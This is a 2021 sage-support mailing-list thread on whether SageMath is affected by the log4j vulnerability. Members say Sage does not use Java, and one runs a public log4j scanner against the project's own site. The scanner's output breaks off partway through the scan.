log4j

Angela Hicks

unread,

Dec 14, 2021, 9:47:31 AM12/14/21

to sage-support

Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals (admittedly a low bar) thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?

-Angela

William Stein

unread,

Dec 14, 2021, 4:54:37 PM12/14/21

to sage-s...@googlegroups.com

I think that Sage doesn’t make any use of the JVM or Java so Sage is not vulnerable to the log4j exploit.

On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks <anh...@lehigh.edu> wrote:

Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals (admittedly a low bar) thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?
-Angela

--
You received this message because you are subscribed to the Google Groups "sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com.

--

-- William Stein

Angela Hicks

unread,

Dec 14, 2021, 5:14:26 PM12/14/21

to sage-s...@googlegroups.com

Thanks, William!

Best,

Angela

You received this message because you are subscribed to a topic in the Google Groups "sage-support" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/sage-support/Rq6AzAS5G30/unsubscribe.
To unsubscribe from this group and all its topics, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/CACLE5GCkiYVthOOH3kCc3u2wv8VtGQg7y-fiZjDj%3Dvo20qdq_Q%40mail.gmail.com.

Adil Hasan

unread,

Dec 14, 2021, 5:25:12 PM12/14/21

to sage-s...@googlegroups.com

Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied url is vulnerable to the bug:

https://github.com/fullhunt/log4j-scan

Hth adil

To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/CABJmdsVheJcdHnUhKuFqkw%3DFaSHXTuHFzqS%3D%2Bm4-KNwTn58HUg%40mail.gmail.com.

William Stein

unread,

Dec 14, 2021, 7:53:13 PM12/14/21

to sage-support

On Tue, Dec 14, 2021 at 2:25 PM Adil Hasan <adilh...@gmail.com> wrote:

Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied url is vulnerable to the bug:

https://github.com/fullhunt/log4j-scan

Thanks. It seems the sagemath.org infrastructure is in good shape regarding this:

Last login: Tue Dec 14 16:45:00 on ttys058

wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org

/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory

wstein@max ~ % cd /tmp/log4j-scan

wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://ask.sagemath.org